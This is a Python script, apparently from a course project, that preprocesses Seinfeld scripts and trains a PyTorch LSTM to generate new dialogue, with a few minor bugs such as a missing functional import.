self._patcher = self._mocker.patch(self._target, side_effect=side_effect,", "'2.0'): \"\"\" Removes a previously added response patch. :param endpoint: request endpoint :param", "method_name) return result def reset(self) -> None: \"\"\" Removes all added matches and", "= None, version: str = '2.0'): \"\"\" Removes a previously added response patch.", "self.version = version self.method_name = method_name self.once = once self.callback = callback self.response_data", "\"\"\" Synchronous JSON-RPC client mocker. :param target: method to be mocked :param mocker:", "method name :param result: patched result :param error: patched error :param id: patched", "if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text)", "round-robin way. :param endpoint: request endpoint :param method_name: method name :param result: patched", "= json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data):", "def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request')", "Removes a previously added response patch. 
:param endpoint: request endpoint :param method_name: method", "= self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint)", "call :param callback: patched request callback :param idx: patch index (if there are", "not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args,", "__enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts", "wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str,", "if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return await", "return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name:", "str, result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] =", "self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint,", "= 0, ): \"\"\" Replaces a previously added response patch by a new", "patch by a new one. :param endpoint: request endpoint :param method_name: method name", "a round-robin way. :param endpoint: request endpoint :param method_name: method name :param result:", "False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None:", "Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method", "side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher.", "there are more than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id,", "result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start()", "= False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response patch.", "= Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match", "side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def", "= False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is", "stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result =", "else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return", "import functools as ft import json import unittest.mock from typing import Any, Callable,", "stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self,", "Match: \"\"\" Match object. Incorporates request matching information. 
\"\"\" def __init__( self, endpoint:", "utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import", "a previously added response patch by a new one. :param endpoint: request endpoint", "self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict", "-> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if", "name :param version: JSON-RPC request version :returns: removed response patch \"\"\" if method_name", "Appends response patch. If the same method patch already exists they will be", "result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None:", "or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type,", "\"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client", "functools as ft import json import unittest.mock from typing import Any, Callable, Dict,", "= UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str", ") def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset()", "__init__( self, endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data:", "self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property", "callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType =", "match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] =", "self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method", "= response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to", "**kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher", "Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add( self, endpoint: str,", "__init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker = mocker", "return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) ->", "def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start()" ]
[ "inp = input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\")", "= input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\") else:", "input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\") else: print(\"Not", "a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\") else: print(\"Not Palindrome\")", "<reponame>AgnirudraSil/tetris<filename>scripts/temp/palindrome.py inp = input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower():" ]
[ "that are considered to be \"best\" jobs, and \"worst\" jobs. For example, if", "proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion = float(params) return", "other): return type(self) == type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME", "other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore", "cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other) and \\ self.min_factor ==", "example, if ``proportion = 0.2``, if the selected candidate job is in the", "satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self): return", "0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params):", "hyperparameter by a random factor, sampled from a uniform distribution. Args: min_factor (float):", "} @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor,", "in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [ Perturb", "in the worst n%, use a candidate job in the top n% instead.", "float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other) and \\", "for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in", "the factor (inclusive). max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor", "if ``proportion = 0.2``, if the selected candidate job is in the bottom", "is in the bottom 20%, it will be replaced by a job in", "type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self,", "proportion=0.2): ''' Truncate exploit strategy: if the selected candidate job is in the", "other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in", "in the top 20%. Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion", "for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self):", "= min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor),", "min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), }", "strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat", "float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return", "other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES =", "_EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the", "designated hyperparameter by a random factor, sampled from a uniform distribution. Args: min_factor", "use a candidate job in the top n% instead. 
Args: proportion (float): Proportion", "== type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def", "strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [", "proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def", "_from_params(cls, params): proportion = float(params) return cls(proportion) def __eq__(self, other): return type(self) ==", "min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return", "objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): '''", "def __eq__(self, other): return type(self) == type(other) and \\ self.proportion == other.proportion class", "candidate job is in the bottom 20%, it will be replaced by a", "__init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter by a", "the selected candidate job is in the bottom 20%, it will be replaced", "return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor =", "def __eq__(self, other): return type(self) == type(other) and \\ self.min_factor == other.min_factor and", "-*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize", "return cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\ self.proportion ==", "For example, if ``proportion = 0.2``, if the selected candidate job is in", "# -*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #:", "Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if the", "20%, it will be replaced by a job in the top 20%. Must", "the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE = 'max' class", "class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy:", "instead. Args: proportion (float): Proportion of jobs that are considered to be \"best\"", "exploit strategy: if the selected candidate job is in the worst n%, use", "strategy: multiply the designated hyperparameter by a random factor, sampled from a uniform", "(inclusive). max_factor (float): Maximum value for the factor (exclusive). 
''' self.min_factor = min_factor", "Perturb explore strategy: multiply the designated hyperparameter by a random factor, sampled from", "coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the", "{strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for", "the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2):", "the bottom 20%, it will be replaced by a job in the top", "float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor =", "``proportion = 0.2``, if the selected candidate job is in the bottom 20%,", "in the bottom 20%, it will be replaced by a job in the", "Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self,", "= proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion = float(params)", "= 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated", "will be replaced by a job in the top 20%. Must satisfy ``0", "''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion", "min_factor (float): Minimum value for the factor (inclusive). max_factor (float): Maximum value for", "MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate", "of jobs that are considered to be \"best\" jobs, and \"worst\" jobs. For", "multiply the designated hyperparameter by a random factor, sampled from a uniform distribution.", "params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other):", "is in the worst n%, use a candidate job in the top n%", "job in the top 20%. Must satisfy ``0 < proportion <= 0.5``. '''", "_from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self,", "to be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``,", "#: Minimize the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE =", "min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter by a random", "other): return type(self) == type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor", "Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self):", "-*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the objective MINIMIZE", "(exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor':", "_get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor", "utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the objective", "jobs that are considered to be \"best\" jobs, and \"worst\" jobs. For example,", "Args: min_factor (float): Minimum value for the factor (inclusive). 
max_factor (float): Maximum value", "max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor", "print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize the objective", "distribution. Args: min_factor (float): Minimum value for the factor (inclusive). max_factor (float): Maximum", "_EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME:", "type(self) == type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor", "= 0.2``, if the selected candidate job is in the bottom 20%, it", "''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor),", "if the selected candidate job is in the worst n%, use a candidate", "top 20%. Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion", "from a uniform distribution. Args: min_factor (float): Minimum value for the factor (inclusive).", "jobs. For example, if ``proportion = 0.2``, if the selected candidate job is", "be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``, if", "[ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [ Perturb ]}", "division, print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize the", "__eq__(self, other): return type(self) == type(other) and \\ self.min_factor == other.min_factor and \\", "= float(params) return cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\", "self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor':", "by a random factor, sampled from a uniform distribution. Args: min_factor (float): Minimum", "unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE", "\\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat", "self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]}", "considered to be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion =", "cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\ self.proportion == other.proportion", "Maximum value for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor", "jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``, if the selected", "'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter", "factor (inclusive). max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor =", "for the factor (inclusive). max_factor (float): Maximum value for the factor (exclusive). '''", "job is in the bottom 20%, it will be replaced by a job", "MINIMIZE = 'min' #: Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME", "candidate job in the top n% instead. 
# Exploit/explore strategies for hyperparameter-tuning jobs.
from __future__ import absolute_import, division, print_function, unicode_literals

#: Minimize the objective
MINIMIZE = 'min'
#: Maximize the objective
MAXIMIZE = 'max'


class Truncate(object):
    _EXPLOIT_STRATEGY_NAME = 'truncate'

    def __init__(self, proportion=0.2):
        '''
        Truncate exploit strategy: if the selected candidate job is in the
        worst n%, use a candidate job in the top n% instead.

        Args:
            proportion (float): Proportion of jobs that are considered to be
                "best" jobs, and "worst" jobs. For example, if ``proportion = 0.2``,
                if the selected candidate job is in the bottom 20%, it will be
                replaced by a job in the top 20%. Must satisfy
                ``0 < proportion <= 0.5``.
        '''
        self.proportion = proportion

    def _get_params(self):
        return self.proportion

    @classmethod
    def _from_params(cls, params):
        proportion = float(params)
        return cls(proportion)

    def __eq__(self, other):
        return type(self) == type(other) and \
            self.proportion == other.proportion


class Perturb(object):
    _EXPLORE_STRATEGY_NAME = 'perturb'

    def __init__(self, min_factor=0.8, max_factor=1.2):
        '''
        Perturb explore strategy: multiply the designated hyperparameter by a
        random factor, sampled from a uniform distribution.

        Args:
            min_factor (float): Minimum value for the factor (inclusive).
            max_factor (float): Maximum value for the factor (exclusive).
        '''
        self.min_factor = min_factor
        self.max_factor = max_factor

    def _get_params(self):
        return {
            'minFactor': float(self.min_factor),
            'maxFactor': float(self.max_factor),
        }

    @classmethod
    def _from_params(cls, params):
        min_factor = float(params['minFactor'])
        max_factor = float(params['maxFactor'])
        return cls(min_factor, max_factor)

    def __eq__(self, other):
        return type(self) == type(other) and \
            self.min_factor == other.min_factor and \
            self.max_factor == other.max_factor


_EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [
    Truncate
]}
_EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [
    Perturb
]}
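# Hypothetical usage sketch (not part of the module above): it relies only on
# the constructors, the private (de)serialization hooks, and the registries
# defined above. Each strategy round-trips through its params representation.
truncate = Truncate(proportion=0.25)
assert Truncate._from_params(truncate._get_params()) == truncate

perturb = Perturb(min_factor=0.9, max_factor=1.1)
assert Perturb._from_params(perturb._get_params()) == perturb

# The registries map wire names to strategy classes:
assert _EXPLOIT_STRATEGIES['truncate'] is Truncate
assert _EXPLORE_STRATEGIES['perturb'] is Perturb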
# TV script generation on the Seinfeld corpus: preprocessing, RNN model,
# training, and generation.
import helper
import numpy as np
import torch
import torch.nn as nn
from string import punctuation
from collections import Counter
from torch.utils.data import TensorDataset, DataLoader

data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)

# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
    print('No GPU found. Please use a GPU to train your neural network.')


def create_lookup_tables(text):
    """
    Create lookup tables for vocabulary
    :param text: The text of tv scripts split into words
    :return: A tuple of dicts (vocab_to_int, int_to_vocab)
    """
    word_counts = Counter(text)
    sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True)
    int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)}
    vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}
    return vocab_to_int, int_to_vocab


def token_lookup():
    """
    Generate a dict to turn punctuation into a token.
    :return: Tokenized dictionary where the key is the punctuation and the value is the token
    """
    return {
        '.': '||PERIOD||',
        ',': '||COMMA||',
        '"': '||QUOTATION_MARK||',
        ';': '||SEMICOLON||',
        '!': '||EXCLAMATION_MARK||',
        '?': '||QUESTION_MARK||',
        '(': '||LEFT_PAREN||',
        ')': '||RIGHT_PAREN||',
        '-': '||DASH||',
        '\n': '||RETURN||',
    }


helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
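# Quick sanity check (hypothetical, not in the original script): build the
# lookup tables for a toy word list and verify the two dicts are inverses.
_demo_words = ['jerry', 'hello', 'newman', 'hello', 'hello']
_v2i, _i2v = create_lookup_tables(_demo_words)
assert _v2i['hello'] == 0  # the most frequent word gets id 0
assert all(_i2v[_v2i[w]] == w for w in _demo_words)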
def batch_data(words, sequence_length, batch_size):
    """
    Batch the neural network data using DataLoader
    :param words: The word ids of the TV scripts
    :param sequence_length: The sequence length of each batch
    :param batch_size: The size of each batch; the number of sequences in a batch
    :return: DataLoader with batched data
    """
    n_batches = len(words)//batch_size
    words = words[:n_batches*batch_size]
    features = []
    targets = []
    total = len(words) - sequence_length
    for idx in range(0, total):
        x = words[idx:idx+sequence_length]
        features.append(x)
        y = words[idx+sequence_length]
        targets.append(y)
    train_x = np.array(features)
    train_y = np.array(targets)
    train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y))
    train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size)
    # return a dataloader
    return train_loader


int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
print(token_dict)
print(int_text[:10])
print(list(vocab_to_int.values())[:10])
print(list(int_to_vocab.values())[:10])
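# Illustration (hypothetical numbers): each feature is a sliding window of
# `sequence_length` word ids, and the target is the id that follows it.
_loader = batch_data(list(range(10)), sequence_length=4, batch_size=2)
_x, _y = next(iter(_loader))
# first window [0, 1, 2, 3] predicts 4; second window [1, 2, 3, 4] predicts 5
print(_x)  # tensor([[0, 1, 2, 3], [1, 2, 3, 4]])
print(_y)  # tensor([4, 5])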
class RNN(nn.Module):
    def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
        """
        Initialize the PyTorch RNN Module
        :param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
        :param output_size: The number of output dimensions of the neural network
        :param embedding_dim: The size of embeddings, should you choose to use them
        :param hidden_dim: The size of the hidden layer outputs
        :param dropout: dropout to add in between LSTM/GRU layers
        """
        super(RNN, self).__init__()
        # set class variables
        self.output_size = output_size
        self.n_layers = n_layers
        self.hidden_dim = hidden_dim
        # define model layers
        self.embedding = nn.Embedding(vocab_size, embedding_dim)
        self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True)
        self.fc = nn.Linear(hidden_dim, output_size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, nn_input, hidden):
        """
        Forward propagation of the neural network
        :param nn_input: The input to the neural network
        :param hidden: The hidden state
        :return: Two Tensors, the output of the neural network and the latest hidden state
        """
        batch_size = nn_input.size(0)
        x = self.embedding(nn_input)
        x, h = self.lstm(x, hidden)
        x = x.contiguous().view(-1, self.hidden_dim)
        # x = self.dropout(x)
        x = self.fc(x)
        x = x.view(batch_size, -1, self.output_size)
        x = x[:, -1]
        # return one batch of output word scores and the hidden state
        return x, h

    def init_hidden(self, batch_size):
        '''
        Initialize the hidden state of an LSTM/GRU
        :param batch_size: The batch_size of the hidden state
        :return: hidden state of dims (n_layers, batch_size, hidden_dim)
        '''
        # Implement function
        weight = next(self.parameters()).data
        if train_on_gpu:
            hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(),
                      weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda())
        else:
            hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
                      weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
        return hidden
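# Shape sanity check (hypothetical, small parameters): the network maps a batch
# of word-id sequences to one score per vocabulary word, for the last time step
# only. Mirrors the GPU handling used elsewhere in this script.
_net = RNN(vocab_size=20, output_size=20, embedding_dim=8, hidden_dim=16, n_layers=2)
if train_on_gpu:
    _net.cuda()
_inp = torch.randint(0, 20, (3, 5))
if train_on_gpu:
    _inp = _inp.cuda()
_scores, _h1 = _net(_inp, _net.init_hidden(batch_size=3))
assert _scores.shape == (3, 20)  # (batch_size, vocab_size)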
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
    """
    Forward and backward propagation on the neural network
    :param rnn: The PyTorch Module that holds the neural network
    :param optimizer: The PyTorch optimizer for the neural network
    :param criterion: The PyTorch loss function
    :param inp: A batch of input to the neural network
    :param target: The target output for the batch of input
    :return: The loss and the latest hidden state Tensor
    """
    # move data to GPU, if available
    if train_on_gpu:
        inp, target = inp.cuda(), target.cuda()
    # detach the hidden state from its history, then perform backpropagation
    # and optimization
    h = tuple([each.data for each in hidden])
    rnn.zero_grad()
    output, h = rnn(inp, h)
    loss = criterion(output, target)
    loss.backward()
    nn.utils.clip_grad_norm_(rnn.parameters(), 5)
    optimizer.step()
    # return the loss over a batch and the hidden state produced by our model
    return loss.item(), h


def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
    batch_losses = []
    rnn.train()
    print("Training for %d epoch(s)..." % n_epochs)
    for epoch_i in range(1, n_epochs + 1):
        # initialize hidden state
        hidden = rnn.init_hidden(batch_size)
        for batch_i, (inputs, labels) in enumerate(train_loader, 1):
            # make sure you iterate over completely full batches, only
            n_batches = len(train_loader.dataset)//batch_size
            if batch_i > n_batches:
                break
            # forward, back prop
            loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
            # record loss
            batch_losses.append(loss)
            # printing loss stats
            if batch_i % show_every_n_batches == 0:
                print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
                    epoch_i, n_epochs, np.average(batch_losses)))
                batch_losses = []
    # returns a trained rnn
    return rnn
# Data params
# Sequence Length
sequence_length = 8  # of words in a sequence
# Batch Size
batch_size = 100
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)

# Training parameters
# Number of Epochs
num_epochs = 5
# Learning Rate
learning_rate = 0.001

# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 128
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 2
# Show stats for every n number of batches
show_every_n_batches = 500

# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
    rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./trained_tv_script', trained_rnn)
print('Model Trained and Saved')
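# Note (illustrative, hypothetical numbers): nn.CrossEntropyLoss applies
# log-softmax internally, which is why forward() returns raw scores (logits)
# rather than probabilities.
_logits = torch.tensor([[2.0, 0.5, -1.0]])  # scores for a 3-word vocabulary
_target = torch.tensor([0])                 # the true next-word id
print(nn.CrossEntropyLoss()(_logits, _target))  # small loss: class 0 dominates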
the generated", "size output_size = vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension", "int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii:", "with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted =", "',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')':", "token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size,", "self.output_size) x = x[:, -1] # return one batch of output word scores", "\"\"\" rnn.eval() # create a sequence (batch_size=1) with the prime_id current_seq = np.full((1,", "prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural network :param", "Replace punctuation tokens for key, token in token_dict.items(): ending = ' ' if", "tables for vocabulary :param text: The text of tv scripts split into words", "= gen_sentences.replace('( ', '(') # return all the sentences return gen_sentences # run", "the next word top_k = 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze()", "word for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word", "for starting the script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT IS", "add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class variables self.output_size", "Module that holds the neural network :param decoder_optimizer: The PyTorch optimizer for the", "The hidden state :return: Two Tensors, the output of the neural network and", "of word id keys to word values :param token_dict: Dict of puncuation tokens", "trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict =", "# create model and move to gpu if available rnn = RNN(vocab_size, output_size,", "output_size = vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim", "the next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p = 